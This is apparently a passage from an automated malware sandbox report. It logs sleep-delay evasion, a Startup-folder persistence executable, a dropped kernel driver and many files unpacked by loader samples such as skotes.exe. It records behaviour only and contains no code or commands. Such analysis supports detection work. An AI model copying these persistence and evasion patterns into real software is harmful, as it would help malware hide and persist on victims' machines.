                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 596745Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 596636Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 596500Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 596078Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595875Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595731Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595607Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595468Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595299Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595156Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595030Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594920Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594812Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594702Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594593Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594484Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594375Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594265Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594156Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594047Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 593936Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 593778Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 593625Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 593323Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 593202Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 593094Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeWindow / User API: threadDelayed 4008Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeWindow / User API: threadDelayed 5719Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWindow / User API: threadDelayed 5081
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWindow / User API: threadDelayed 4734
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5597
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4178
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeWindow / User API: threadDelayed 3538
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeWindow / User API: threadDelayed 4893
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pyexpat.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingft.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_keccak.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_ghash_clmul.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\python311.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli-32.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_MD2.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_chacha20.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA224.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-32.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_MD4.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ed25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pywintypes311.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_strxor.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libssl-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA224.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli-arm64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\markupsafe\_speedups.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA512.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\select.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_ARC4.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-arm64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_poly1305.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\is-4SN19.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_ARC4.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA512.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_ghash_portable.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ed448.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\9rpcss_1.drv (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJump to dropped file
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeDropped PE file which has not been started: C:\Windows\Temp\aodefromlpug.sysJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1034109001\bed2608720.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_chacha20.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_BLAKE2b.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_RIPEMD160.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_keccak.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Protocol\_scrypt.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pythoncom311.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA1.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\psutil\_psutil_windows.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_poly1305.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingmorph.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA256.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_des.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_BLAKE2s.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ed448.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ec_ws.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_shfoldr.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_cpuid_c.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli-64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Math\_modexp.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Protocol\_scrypt.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_MD5.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_MD5.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA256.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ed25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-VSE52.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_isdecmp.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_x25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA1.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ec_ws.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_x25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\python3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Math\_modexp.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_MD2.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA384.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_MD4.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_shfoldr.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA384.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_isdecmp.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_cpuid_c.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_strxor.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libffi-8.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_ghash_portable.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_RIPEMD160.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5776Thread sleep time: -34017s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 824Thread sleep count: 68 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 824Thread sleep time: -136068s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3264Thread sleep count: 71 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3264Thread sleep time: -142071s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3288Thread sleep count: 156 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3288Thread sleep time: -4680000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5448Thread sleep count: 59 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5448Thread sleep time: -118059s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5856Thread sleep count: 70 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5856Thread sleep time: -140070s >= -30000sJump to behavior
